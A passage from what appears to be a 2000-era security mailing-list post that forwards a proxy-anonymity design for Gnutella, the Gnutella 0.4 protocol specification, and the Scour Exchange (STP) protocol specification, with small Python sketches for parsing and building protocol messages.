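        """Store the result of the initial '*.*'-type search against a new client."""
        self._files[client] = list(shared_files)

    def answer_outside_search(self, query: str):
        """Answer an outside search from the stored lists; the client never sees it."""
        q = query.lower()
        return [(client, name)
                for client, names in self._files.items()
                for name in names
                if q in name.lower()]

    def note_client_search(self, message_id: bytes, client):
        self._pending[message_id] = client

    def route_response(self, message_id: bytes):
        """Pass a response inward only if a private client actually asked for it."""
        return self._pending.get(message_id)

proxy = ProxyIndex()
proxy.register_client("alice", ["slides.ppt", "notes.txt"])
print(proxy.answer_outside_search("ppt"))  # [('alice', 'slides.ppt')]
proxy.note_client_search(b"q1", "alice")
print(proxy.route_response(b"q1"))         # alice
print(proxy.route_response(b"q2"))         # None
```

If Alice returns an empty file list at registration, nothing of hers is ever offered to the outside, which matches the last sentence of the paragraph above.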

If we assume that Alice only wants to connect to proxying servents like Charlie, and that Charlie is working together with these other proxy servents, then we have a way for Alice to stay behind a proxy. Upon receiving Alice's INIT packet, Charlie does not pass it on to the rest of the network, but spoofs return packets for the other proxy servers he is working with. In this way, Alice's host catcher is only populated with other proxy servers and the outside network does not even have to know that Alice exists.

If we want to add another level of complexity, such that Alice's files are not directly pointed to by Charlie's spoofed search return packets, then we can have Charlie act as a gateway for Alice and Bob. Bob does a search that matches one of Alice's files. Charlie spoofs the search response to look like he is holding the file. When Bob requests the file, Charlie simultaneously requests the file from Alice and simply shovels the data in one port and out the other. Requests from Alice to Bob work in the same manner. Alice and Bob never even have to know about each other.

This also allows Alice, who can only connect to Charlie because of her firewall, to get files from Bob. Of course, this doesn't stop Eve from spoofing search results or substituting trojans, but it does keep Eve's knowledge of Alice very limited. Also, what you then essentially have is a Napster network in which the servers/servents talk to each other.

Of course, if Alice is able to connect to other non-proxy servents outside of her private network then she certainly could still do so. However, it is in her best interests, for bandwidth reasons and anonymity, to only connect to one proxy server at a time and no one else.

--kyx----kyx----kyx----kyx----kyx----kyx----kyx----kyx--
(and the protocol spec....  --dr)

url: http://gnutelladev.wego.com/go/wego.pages.page?groupId=139406&view=page&folderId=145203&pageId=145249

PROTOCOL
Gnutella/0.4 protocol

  
The Gnutella protocol

Last update: 15 April 2000

Updated PUSH request routing instructions. Please comment. gene at ...613...



Notes
Everything is in network byte order unless otherwise noted. Byte order of the GUID is not important. 

Apparently, there is some confusion as to what "\r" and "\n" are. Well, \r is carriage return, or 0x0d, and \n is newline, or 0x0a. This is standard ASCII, but there it is, from "man ascii".

Keep in mind that every message you send can be replied to by multiple hosts. Hence, Ping is used to discover hosts, as the Pong (Ping reply) contains host information.

Throughout this document, the terms server and client are interchangeable. Gnutella clients are Gnutella servers.

Thanks to capnbry for his efforts in decoding the protocol and posting it.

How GnutellaNet works
General description

GnutellaNet works by "viral propagation". I send a message to you, and you send it to all clients connected to you. That way, I only need to know about you to know about the entire rest of the network.

A simple glance at this message delivery mechanism will tell you that it generates inordinate amounts of traffic. Take for example the defaults for Gnutella 0.54. It defaults to maintaining 25 active connections with a TTL of 7 (TTL means Time To Live, or the number of times a message can be passed on before it "dies"). In the worst of worlds, this means 25^7, or 6103515625 (6 billion) messages resulting from just one message!
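
The 25^7 figure is easy to check. The helper below is only a back-of-the-envelope sketch (the function name is made up) and it takes the text's worst case at face value: every host passes the message to 25 others at every hop.

```python
def worst_case_messages(connections: int, ttl: int) -> int:
    """Messages generated at the last hop if every host forwards to
    `connections` peers and nobody ever sees a duplicate."""
    return connections ** ttl


print(worst_case_messages(25, 7))  # 6103515625
```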

Well, okay. In truth it isn't that bad. In reality, there are fewer than two thousand Gnutella clients on the GnutellaNet at any one time. That means that long before the TTL expires on our hypothetical message, every client on the GnutellaNet will have seen our message.

Obviously, once a client sees a message, it's unnecessary for it to process the message again. The original Gnutella designers, in recognition of this, engineered each message to contain a GUID (Globally Unique Identifier) which allows Gnutella clients to uniquely identify each message on the network.

So how do Gnutella clients take advantage of the GUID? Each Gnutella client maintains a short memory of the GUIDs it has seen. For example, I will remember each message I have received. I forward each message I receive as appropriate, unless I have already seen the message. If I have seen the message, that means I have already forwarded it, so everyone I forwarded it to has already seen it, and so on. So I just forget about the duplicate and save everyone the trouble. 
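
The "short memory" could be sketched as a small bounded cache. The class name and the capacity of 1024 are assumptions for the example; the text does not say how long real clients remember a GUID.

```python
from collections import OrderedDict


class SeenCache:
    """Bounded memory of message GUIDs (the capacity is an assumed value)."""

    def __init__(self, capacity: int = 1024):
        self.capacity = capacity
        self._seen = OrderedDict()

    def should_forward(self, guid: bytes) -> bool:
        # A GUID we already hold means the message was forwarded before,
        # so the duplicate is silently forgotten.
        if guid in self._seen:
            return False
        self._seen[guid] = True
        # Forget the oldest GUID once the memory is full.
        if len(self._seen) > self.capacity:
            self._seen.popitem(last=False)
        return True
```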

Topology

The GnutellaNet has no hierarchy. Every server is equal. Every server is also a client. So everyone contributes. Well, as in all egalitarian systems, some servers are more equal than others. Servers running on fast connections can support more traffic. They become a hub for others, and therefore get their requests answered much more quickly. Servers on slow connections are relegated to the backwaters of the GnutellaNet, and get search results much more slowly. And if they pretend to be fast, they get flooded to death.

But there's more to it than that.

Each Gnutella server only knows about the servers that it is directly connected to. All other servers are invisible, unless they announce themselves by answering to a PING or by replying to a QUERY. This provides amazing anonymity.

Unfortunately, the combination of having no hierarchy and the lack of a definitive source for a server list means that the network is not easily described. It is not a tree (since there is no hierarchy) and it is cyclic. Being cyclic means there is a lot of needless network traffic. Clients today do not do much to reduce the traffic, but for the GnutellaNet to scale, developers will need to start thinking about that.

Connecting to a server
After making the initial connection to the server, you must handshake. Currently, the handshake is very simple. The connecting client says:

GNUTELLA CONNECT/0.4\n\n

The accepting server responds:

GNUTELLA OK\n\n

After that, it's all data.
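
A minimal sketch of both sides of that handshake over an already-connected socket. The function names are invented, and error handling is reduced to the bare minimum.

```python
import socket

CONNECT = b"GNUTELLA CONNECT/0.4\n\n"
OK = b"GNUTELLA OK\n\n"


def recv_exact(sock: socket.socket, n: int) -> bytes:
    """Read exactly n bytes or raise if the peer hangs up first."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed during handshake")
        buf += chunk
    return buf


def client_handshake(sock: socket.socket) -> bool:
    """Connecting side: send the greeting, expect the OK string."""
    sock.sendall(CONNECT)
    return recv_exact(sock, len(OK)) == OK


def server_handshake(sock: socket.socket) -> bool:
    """Accepting side: expect the greeting, answer with the OK string."""
    if recv_exact(sock, len(CONNECT)) != CONNECT:
        return False
    sock.sendall(OK)
    return True
```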

Downloading from a server
Downloading files from a server is extremely easy. It's HTTP. The downloading client requests the file in the normal way:

GET /get/1234/strawberry-rhubarb-pies.rcp HTTP/1.0\r\n
Connection: Keep-Alive\r\n
Range: bytes=0-\r\n
\r\n

As you can see, Gnutella supports the range parameter for resuming partial downloads. The 1234 is the file index (see HITS section, below), and "strawberry-rhubarb-pies.rcp" is the filename.

The server will respond with normal HTTP headers. For example: 

HTTP 200 OK\r\n
Server: Gnutella\r\n
Content-type:application/binary\r\n
Content-length: 948\r\n
\r\n

The important bit is the "Content-Length" header. That tells you how much data to expect. After you get your fill, close the socket.
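
To make the exchange concrete, here is a small sketch that builds the request shown above and pulls the length out of a reply. Both function names are made up. The header name is matched case-insensitively because the example reply spells it "Content-length" while the text says "Content-Length". Filenames are assumed to be plain ASCII.

```python
def build_get(index: int, filename: str, start: int = 0) -> bytes:
    """Build the download request; `start` is the resume offset."""
    lines = [
        f"GET /get/{index}/{filename} HTTP/1.0",
        "Connection: Keep-Alive",
        f"Range: bytes={start}-",
        "",
        "",
    ]
    return "\r\n".join(lines).encode("ascii")


def content_length(header_block: bytes) -> int:
    """Return the Content-Length value from a block of response headers."""
    for line in header_block.split(b"\r\n")[1:]:
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"content-length":
            return int(value.strip())
    raise ValueError("no Content-Length header found")
```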

Header

bytes   summary                 description
0-15    Message identifier      This is a Windows GUID. I'm not really sure how
                                globally-unique this has to be. It is used to
                                determine if a particular message has already
                                been seen.
16      Payload descriptor      Value   Function
        (function identifier)   0x00    Ping
                                0x01    Pong (Ping reply)
                                0x40    Push request
                                0x80    Query
                                0x81    Query hits (Query reply)
17      TTL                     Time to live. Each time a message is forwarded
                                its TTL is decremented by one. If a message is
                                received with TTL less than one (1), it should
                                not be forwarded.
18      Hops                    Number of times this message has been forwarded.
19-22   Payload length          The length of the ensuing payload.
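
The 23-byte header maps neatly onto a struct. This is only a sketch: the function names are invented, and the payload length is packed in network byte order purely because the Notes section says so. Check that against real traffic before relying on it.

```python
import struct
import uuid

# 16-byte GUID, function, TTL, hops, 4-byte payload length = 23 bytes.
# "!" = network byte order, assumed from the Notes section of this spec.
HEADER = struct.Struct("!16sBBBI")

FUNCTIONS = {
    0x00: "ping",
    0x01: "pong",
    0x40: "push request",
    0x80: "query",
    0x81: "query hits",
}


def new_guid() -> bytes:
    """A random 16-byte message identifier."""
    return uuid.uuid4().bytes


def pack_header(guid: bytes, function: int, ttl: int, hops: int,
                payload_length: int) -> bytes:
    return HEADER.pack(guid, function, ttl, hops, payload_length)


def unpack_header(data: bytes) -> dict:
    guid, function, ttl, hops, length = HEADER.unpack(data[:HEADER.size])
    return {
        "guid": guid,
        "function": FUNCTIONS.get(function, "unknown"),
        "ttl": ttl,
        "hops": hops,
        "payload_length": length,
    }
```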

Payload: ping (function 0x00)
No payload
Routing instructions
Forward PING packets to all connected clients. Most other documents state that you should not forward packets to their originators. I think that's a good optimization, but not a real requirement. A server should be smart enough to know not to forward a packet that it originated.
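
Put together with the TTL and Hops rules from the header, the forwarding decision might look like the sketch below. The function name is made up, and skipping the connection the packet arrived on is the optional optimization mentioned above, not a requirement.

```python
def plan_forward(ttl, hops, arrived_on, connections):
    """Return (new_ttl, new_hops, targets), or None if the packet must die.

    `connections` is any list of connection handles; `arrived_on` is the
    handle the packet came in on.
    """
    # Received with TTL less than one: do not forward.
    if ttl < 1:
        return None
    # Optional optimization: do not send the packet back where it came from.
    targets = [c for c in connections if c != arrived_on]
    return ttl - 1, hops + 1, targets
```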

A cursory analysis of GnutellaNet traffic shows that PING comprises roughly 50% of the network traffic. Clearly, this needs to be optimized. One of the problems with clients today is that they seem to PING the network periodically. That is indeed necessary, but the frequency of these "update" PINGs can be drastically reduced. Simply watching the PONG messages that your client routes is enough to capture lots of hosts.

One possible way to really reduce the number of PINGs is to alter the protocol to support PING messages which includes PONG data. That way you need only wait for hosts to announce themselves, rather than discovering them yourself.

Payload: pong (Ping reply) (function 0x01)
bytes   summary               description
0-1     Port                  IPv4 port number.
2-5     IP address            IPv4 address. x86 byte order! Little endian!
6-9     Number of files       Number of files the host is sharing.
10-13   Number of kilobytes   Number of kilobytes the host is sharing.
Routing instructions
Like all replies, PONG packets are "routed". In other words, you need to forward this packet only back down the path its PING came from. If you didn't see its PING, then you have an interesting situation that should never arise. Why? If you didn't see the PING that corresponds with this PONG, then the server sending this PONG routed it incorrectly.
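
A sketch of decoding the 14-byte pong payload. The function name is invented. The "little endian" remark on the address is ambiguous about which octet comes first on the wire, so the sketch takes it literally (least significant byte first) and leaves a flag to try the other reading. The remaining fields are assumed to be in network byte order, per the Notes.

```python
import socket
import struct


def parse_pong(payload: bytes, ip_little_endian: bool = True) -> dict:
    if len(payload) < 14:
        raise ValueError("pong payload must be at least 14 bytes")
    (port,) = struct.unpack_from("!H", payload, 0)
    raw_ip = payload[2:6]
    if ip_little_endian:
        # Assumed reading of "x86 byte order": octets arrive reversed.
        raw_ip = raw_ip[::-1]
    files, kilobytes = struct.unpack_from("!II", payload, 6)
    return {
        "port": port,
        "ip": socket.inet_ntoa(raw_ip),
        "files": files,
        "kilobytes": kilobytes,
    }
```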

Payload: query (function 0x80)
bytes   summary           description
0-1     Minimum speed     The minimum speed, in kilobytes/sec, of hosts which
                          should reply to this request.
2+      Search criteria   Search keywords or other criteria. NULL terminated.
Routing instructions
Forward QUERY messages to all connected servers.
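
Building and reading a query payload is about as simple as it gets. A sketch with invented function names, assuming ASCII search strings and network byte order for the speed field:

```python
import struct


def build_query(min_speed: int, criteria: str) -> bytes:
    """Two-byte minimum speed followed by the NULL-terminated criteria."""
    return struct.pack("!H", min_speed) + criteria.encode("ascii") + b"\x00"


def parse_query(payload: bytes):
    (min_speed,) = struct.unpack_from("!H", payload, 0)
    # Everything up to the first NULL is the search string.
    criteria = payload[2:].split(b"\x00", 1)[0].decode("ascii")
    return min_speed, criteria
```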

Payload: query hits (query reply) (function 0x81)
bytes           summary              description
0               Number of hits (N)   The number of hits in this set. See "Result set" below.
1-2             Port                 IPv4 port number.
3-6             IP address           IPv4 address. x86 byte order! Little endian!
7-10            Speed                Speed, in kilobits/sec, of the responding host.
11+             Result set           There are N of these (see "Number of hits" above).

                                     bytes   summary     description
                                     0-3     Index       Index number of file.
                                     4-7     Size        Size of file in bytes.
                                     8+      File name   Name of file. Terminated by double-NULL.

Last 16 bytes   Client identifier    GUID of the responding host. Used in PUSH.
Routing instructions
HITS are routed. Send these messages back on their inbound path.
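
The variable-length result set is the fiddly part of this payload, so here is a sketch of walking it. The function name is invented. Numeric fields are assumed to be in network byte order per the Notes, the address is handed back as four raw bytes so the caller can settle the byte-order question, and file names are decoded as Latin-1 only so that any byte value is accepted.

```python
import struct


def parse_query_hits(payload: bytes) -> dict:
    count = payload[0]
    (port,) = struct.unpack_from("!H", payload, 1)
    ip_raw = payload[3:7]               # byte order left to the caller
    (speed,) = struct.unpack_from("!I", payload, 7)
    end = len(payload) - 16             # the client identifier trails the results
    offset = 11
    results = []
    for _ in range(count):
        index, size = struct.unpack_from("!II", payload, offset)
        offset += 8
        # The file name runs up to the double-NULL terminator.
        stop = payload.index(b"\x00\x00", offset, end)
        name = payload[offset:stop].decode("latin-1")
        offset = stop + 2
        results.append({"index": index, "size": size, "name": name})
    return {
        "port": port,
        "ip_raw": ip_raw,
        "speed": speed,
        "results": results,
        "client_id": payload[end:],
    }
```

The index and file name of each result are what go into the /get/ request when downloading.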

Payload: push request (function 0x40)
bytes   summary             description
0-15    Client identifier   GUID of the host which should push.
16-19   Index               Index number of file (given in query hit).
20-23   IP address          IPv4 address to push to.
24-25   Port                IPv4 port number to push to.
Routing instructions
Forward PUSH messages only along the path on which the query hit was delivered. If you missed the query hit then drop the packet, since you are not instrumental in the delivery of the PUSH request.
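
Routing a PUSH this way means remembering where each query hit came from. A sketch, with an invented class name; keying the table by the client identifier from the query hit, and keeping the first path seen, are both assumptions.

```python
class RouteTable:
    """Remembers which connection a query hit arrived on."""

    def __init__(self):
        self._routes = {}

    def remember(self, client_id: bytes, connection) -> None:
        # Called when a query hit passes through; the first path seen wins.
        self._routes.setdefault(client_id, connection)

    def route(self, client_id: bytes):
        # Connection to forward a PUSH on, or None meaning "drop it".
        return self._routes.get(client_id)
```

A servent would call remember() for every query hit it routes and route() for every PUSH it receives, dropping the PUSH when route() returns None.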


--kyx----kyx----kyx----kyx----kyx----kyx----kyx----kyx--
(and the specs for a similar peer-peer system.  --dr)

url: http://www.scour.com/Software/Scour_Exchange/stp-1.0pre10.html

Scour Transfer Protocol -- STP/1.0pre10


Copyright Notice

This document is meant to serve as a guideline for developers wishing
to understand the details of the Scour Exchange protocol in order to
create or make changes to existing Scour Exchange clients for various
platforms.

Scour, Inc. makes no representations or warranties as to the accuracy
of this document. Please send all correspondence to opendev at ...614...

Copyright (C) 1999-2000 Scour, Inc.



 General 

The server and client are linked by a client-initiated 
TCP connection. The maximum packet size is 64 kilobytes. Packets
larger than 64KB should be split into multiple packets.

New Login (sx client --» sx server) 

STP/1.0 NEWLOGIN\r\n
User-Agent: «agent»\r\n
Username: «username»\r\n
Password: «password»\r\n
First: «firstname»\r\n
Last: «lastname»\r\n
Email: «email»\r\n
Gender: «gender»\r\n
Age: «age»\r\n
Zip: «zipcode»\r\n
IP: «ip»\r\n
Port: «port»\r\n
Speed: «speed»\r\n
Firewall: «firewall»\r\n
\r\n

Optional Fields: User-Agent, Gender, Age, Zip, Hint, Speed,
Firewall

Notes
A blank Firewall setting (or "unknown" as a value) will cause
the sx server to probe the client to determine the firewall
state.

IP is what the client thinks its IP address is.

Login (sx client --» sx server) 

STP/1.0 LOGIN\r\n
User-Agent: «agent»\r\n
Username: «username»\r\n
Password: «password»\r\n
IP: «ip»\r\n
Port: «port»\r\n
Speed: «speed»\r\n
Firewall: «firewall»\r\n
\r\n

Optional Fields: User-Agent, Speed, Firewall
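
Since every STP message is a request line plus "Name: value" lines, a tiny builder and parser covers most of the spec. This is just a sketch with invented function names; fields are kept as a list of pairs because some messages repeat a field name. The password helper follows the Data Types section (MD5 hash of the actual password, 32 chars) and assumes hex digits.

```python
import hashlib


def password_field(plain: str) -> str:
    """32-char MD5 hex digest of the actual password."""
    return hashlib.md5(plain.encode("utf-8")).hexdigest()


def build_stp(command: str, fields) -> bytes:
    """Build e.g. 'STP/1.0 LOGIN' plus fields, ended by a blank line."""
    lines = [f"STP/1.0 {command}"]
    lines += [f"{name}: {value}" for name, value in fields]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


def parse_stp(message: bytes):
    """Return (first_line, [(name, value), ...]) for one message."""
    head = message.partition(b"\r\n\r\n")[0].decode("ascii")
    first, *rest = head.split("\r\n")
    fields = []
    for line in rest:
        name, _, value = line.partition(": ")
        fields.append((name, value))
    return first, fields
```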

Login Response 1xx (sx server --» sx client) 

STP/1.0 100 Authorized\r\n
Firewall: «firewall»\r\n
\r\n

STP/1.0 101 Unauthorized\r\n
\r\n

STP/1.0 102 Invalid Login Request\r\n
\r\n

STP/1.0 104 Username already registered\r\n
\r\n

STP/1.0 105 Already Logged In\r\n
\r\n

Add File(s) (sx client --» sx server) 

STP/1.0 ADD\r\n
Filename: «filename»\r\n
Size: «size»\r\n
MD5: «md5hash»\r\n
Bitrate: «bitrate»\r\n
Duration: «duration»\r\n
Freq: «frequency»\r\n
Width: «width»\r\n
Height: «height»\r\n
Bpp: «bpp»\r\n
Fps: «fps»\r\n
Filename: «filename»\r\n
Size: «size»\r\n
MD5: «md5hash»\r\n
Bitrate: «bitrate»\r\n
Duration: «duration»\r\n
Freq: «frequency»\r\n
Width: «width»\r\n
Height: «height»\r\n
Bpp: «bpp»\r\n
Fps: «fps»\r\n
....
\r\n

Optional fields: Bitrate, Duration, Freq, Width, Height, Bpp, Fps

Notes
Can have multiple "Filename" segments per ADD message.

The MD5 hash is calculated using the first 300KB (307200 bytes)
of the file being added.
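
The hashing rule can be sketched in a few lines. The function name is made up, and the in-memory sample stands in for a file opened in binary mode.

```python
import hashlib
import io

HASH_PREFIX = 307200  # first 300KB, as stated in the note above


def stp_md5(fileobj) -> str:
    """MD5 hex digest of at most the first 300KB of a binary file object."""
    return hashlib.md5(fileobj.read(HASH_PREFIX)).hexdigest()


# A 400000-byte sample; only its first 307200 bytes are hashed.
sample = io.BytesIO(b"x" * 400000)
digest = stp_md5(sample)
```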

Delete File(s) (sx client --» sx server) 

STP/1.0 DELETE\r\n
Filename: «filename»\r\n
Filename: «filename»\r\n
Filename: «filename»\r\n
\r\n

Can have multiple "Filename" entries per DELETE message.

Download Request (sx client --» sx client) 

STP/1.0 GET\r\n
User-Agent: «agent»\r\n
Username: «username»\r\n
Filename: «filename»\r\n
Range: bytes=«start»-«end»\r\n
Speed: «speed»\r\n
\r\n

Optional fields: User-Agent, Range, Speed

This is sent when the sx client is not firewalled.

Download Request (sx client --» sx server) 

STP/1.0 GET\r\n
User-Agent: «agent»\r\n
Servername: «username»\r\n
Filename: «filename»\r\n
Range: bytes=«start»-«end»\r\n
\r\n

Optional fields: User-Agent, Range

Download Request (sx server --» sx client) 

STP/1.0 GET\r\n
Username: «username»\r\n
Filename: «filename»\r\n
Range: bytes=«start»-«end»\r\n
Speed: «speed»\r\n
IP: «ip»\r\n
Port: «port»\r\n
\r\n

Optional fields: Range, Speed

Download Response 200 (sx client --» sx client) 

STP/1.0 200 OK\r\n
User-Agent: «agent»\r\n
Servername: «username»\r\n
Filename: «filename»\r\n
MD5: «md5hash»\r\n
Speed: «speed»\r\n
Content-Length: «length»\r\n
Content-Range: bytes=«start»-«end»/«filesize»\r\n
Content-Type: «type»\r\n
\r\n
[Entity-Body]


Optional fields: User-Agent, Content-Range, Speed

Notes
"Content-Type" should be "application/octet-stream" for all
file transfers.

Download Response Error 40x (sx client --» sx client) 

STP/1.0 400 Bad Request\r\n
User-Agent: «agent»\r\n
Servername: «servername»\r\n
Filename: «filename»\r\n
\r\n

STP/1.0 401 Queue Full\r\n
User-Agent: «agent»\r\n
Servername: «servername»\r\n
Filename: «filename»\r\n
\r\n

STP/1.0 404 File Not Found\r\n
User-Agent: «agent»\r\n
Servername: «servername»\r\n
Filename: «filename»\r\n
\r\n

Optional fields: User-Agent

Download Response Error 41x (sx server --» sx client) 

STP/1.0 410 Server Not Found\r\n
Servername: «username»\r\n
Filename: «filename»\r\n
\r\n

SEARCH (sx client --» sx server) 

STP/1.0 SEARCH\r\n
Search-ID: «id»\r\n
Type: «type»\r\n
Offset: «offset»\r\n
Num-Results: «num»\r\n
MD5: «md5»\r\n
Width: «width»\r\n
Height: «height»\r\n
Bitrate: «bitrate»\r\n
Duration: «duration»\r\n
Freq: «freq»\r\n
Speed: «speed»\r\n
Bpp: «bpp»\r\n
Fps: «fps»\r\n
Username: «username»\r\n
Query: «querystring»\r\n
...
\r\n

Optional fields: MD5, Width, Height, Bitrate, Freq, Speed, Bpp, Fps,
Search-ID, Offset, Num-Results, Type

Offset defaults to 0, Num-Results defaults to 100, Type defaults to all

Notes

If Username is specified, the query will return a listing of
files on that host.

Search-ID is an identifier created by the client. The identifier
is copied into the Search Response 300. This should allow the client
to match the results with the corresponding query. This field can
have an alphanumeric value.

If MD5 is sent, this means the client is requesting a list of files
which have the corresponding MD5 hash. The fields Type, Width, Height,
Bitrate, Freq, Speed, and Keyword should not be present.

A client can have only one outstanding search query. If a 2nd
SEARCH is sent, the first is cancelled if the results haven't
already been sent to the client.


CANCEL_SEARCH (sx client --» sx server) 

STP/1.0 CANCEL_SEARCH\r\n
\r\n

Notes

A client can have only one outstanding search query. The CANCEL_SEARCH
will cancel the current query. The search results may or may not be
sent to the client -- depending on when the CANCEL_SEARCH was sent.


Search Response 30x (sx server --» sx client) 

STP/1.0 300 OK\r\n
Search-ID: «id»\r\n
Type: «type»\r\n
Offset: «offset»\r\n
Num-Results: «num»\r\n
Filename: «filename»\r\n
Username: «username»\r\n
IP: «ip»\r\n
Port: «port»\r\n
Speed: «speed»\r\n
MD5: «md5»\r\n
Size: «size»\r\n
Width: «width»\r\n
Height: «height»\r\n
Bitrate: «bitrate»\r\n
Freq: «freq»\r\n
Duration: «duration»\r\n
Bpp: «bpp»\r\n
Fps: «fps»\r\n
Filename: «filename»\r\n
Username: «username»\r\n
...
\r\n

STP/1.0 301 Database Error\r\n
Search-ID: «id»\r\n

Optional fields: Width, Height, Bitrate, Freq, Duration, Bpp, Fps
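
A sketch of splitting a 300 response into per-file records. The function name is invented, and it assumes each result begins at a "Filename" line, which is how the example above is laid out; anything before the first Filename is treated as search-level data.

```python
def parse_search_response(message: bytes):
    """Return (status_line, search_fields, [record, ...])."""
    head = message.partition(b"\r\n\r\n")[0].decode("ascii")
    status, *lines = head.split("\r\n")
    meta, records = {}, []
    for line in lines:
        name, _, value = line.partition(": ")
        if name == "Filename":
            records.append({})          # a new result starts here
        target = records[-1] if records else meta
        target[name] = value
    return status, meta, records
```

The Search-ID in the search-level fields is what lets a client match the results to the query it sent.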


Add User (sx client --» sx server) 

STP/1.0 ADDUSER\r\n
Username: «username»\r\n
Username: «username»\r\n
...
\r\n

Notes
This adds a user to the client's Hotlist. The backend 
will send notification to the client when a user's online 
status changes.

This should be sent once after logging in, and any time a 
user is added to the Hotlist.


Delete User (sx client --» sx server) 

STP/1.0 DELUSER\r\n
Username: «username»\r\n
Username: «username»\r\n
...
\r\n

Notes
This deletes a user from the client's Hotlist.


User Status (sx server --» sx client) 

STP/1.0 USER_STATUS\r\n
Username: «username»\r\n
Status: «status»\r\n
\r\n

status = online | offline

Notes
This notifies the sx client that a user on its Hotlist has changed status.


Server Error (sx server --» sx client) or (sx client --» sx client) 

STP/1.0 500 Internal Server Error\r\n
User-Agent: «agent»\r\n
\r\n

STP/1.0 501 Not Implemented\r\n
User-Agent: «agent»\r\n
\r\n

Optional fields: User-Agent

Notes
500 is sent for malformed commands

STAT (sx server --» sx client) 

STP/1.0 STAT\r\n
Ack-Required: «ackval»\r\n
Total-Users: «totalusers»\r\n
Total-Files: «totalfiles»\r\n
Total-Size: «totalsize»\r\n
\r\n


Notes
ackval = yes | no

If ackval == yes, then client must send a "STP/1.0 ACK" message (described below)
to the sx server.


Total-Size is reported in megabytes.

HELO (sx client --» sx client) or (sx server --» sx client) 

STP/1.0 HELO\r\n
\r\n

ACK (sx client --» sx client) or (sx client --» sx server) 

STP/1.0 ACK\r\n
User-Agent: «agent»\r\n
Username: «username»\r\n
\r\n

Optional fields: User-Agent



Data Types 

Username = 2 to 32 chars, [0-9a-zA-Z_-]
Gender = M | F
Firewall = yes | no | unknown
Password = MD5 hash of actual password, 32 chars
MD5 = 32 chars, [0-9a-f]
Type = all|audio|video|image|mp3|jpeg|gif
Speed = number, 0-10
0  unknown
1  14.4 kbps
2  28.8 kbps
3  33.6 kbps
4  56.7 kbps
5  64K ISDN
6  128K ISDN
7  Cable
8  DSL
9  T1
10 T3 or greater
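
These data types translate directly into a lookup table and a couple of regular expressions. A sketch with invented names; the labels are copied from the table above as written.

```python
import re

SPEEDS = {
    0: "unknown", 1: "14.4 kbps", 2: "28.8 kbps", 3: "33.6 kbps",
    4: "56.7 kbps", 5: "64K ISDN", 6: "128K ISDN", 7: "Cable",
    8: "DSL", 9: "T1", 10: "T3 or greater",
}

USERNAME_RE = re.compile(r"[0-9a-zA-Z_-]{2,32}")
MD5_RE = re.compile(r"[0-9a-f]{32}")


def describe_speed(code: int) -> str:
    if code not in SPEEDS:
        raise ValueError("speed must be a number from 0 to 10")
    return SPEEDS[code]


def valid_username(name: str) -> bool:
    return USERNAME_RE.fullmatch(name) is not None


def valid_md5(value: str) -> bool:
    return MD5_RE.fullmatch(value) is not None
```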


--kyx----kyx----kyx----kyx----kyx----kyx----kyx----kyx--

This sort of worm "fun" is just beginning IMHO.  --dr

-- 
Dragos Ruiu <dr at ...50...>   dursec.com ltd. / kyx.net - we're from the future 
gpg/pgp key on file at wwwkeys.pgp.net


